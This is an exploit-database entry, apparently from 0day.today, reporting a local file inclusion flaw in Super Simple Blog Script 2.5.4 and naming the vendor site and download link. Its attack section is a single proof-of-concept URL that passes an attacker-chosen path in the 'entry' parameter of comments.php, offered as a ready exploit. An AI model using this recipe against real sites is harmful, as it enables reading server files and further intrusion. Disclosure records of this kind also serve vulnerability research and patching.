id: 5505
date: 07/16/2009
title: Super Simple Blog Script 2.5.4 Local File Inclusion Vulnerability
author: JiKo
cves: 

=================================================================
Super Simple Blog Script 2.5.4 Local File Inclusion Vulnerability
=================================================================


----------[exploit Debut]
[ Local File Inclusion Vulnerability]
----------[Script Info]

Moi	: JIKO
Site	: No-exploit.Com
Email	: mm :( Moghla9 Ferme Closed

----------[Script Info]

Site:http	: http://www.supersimple.org/
Download	: http://supersimple.org/downloads/SuperSimpleBlogScriptV2_5_4.zip

----------[exploit Info]

1]~[LFI]
http://localhost/Path/comments.php?submit=JIKO&entry=[EV!L]
----------[exploit Fin]



#  0day.today [2023-03-24]  #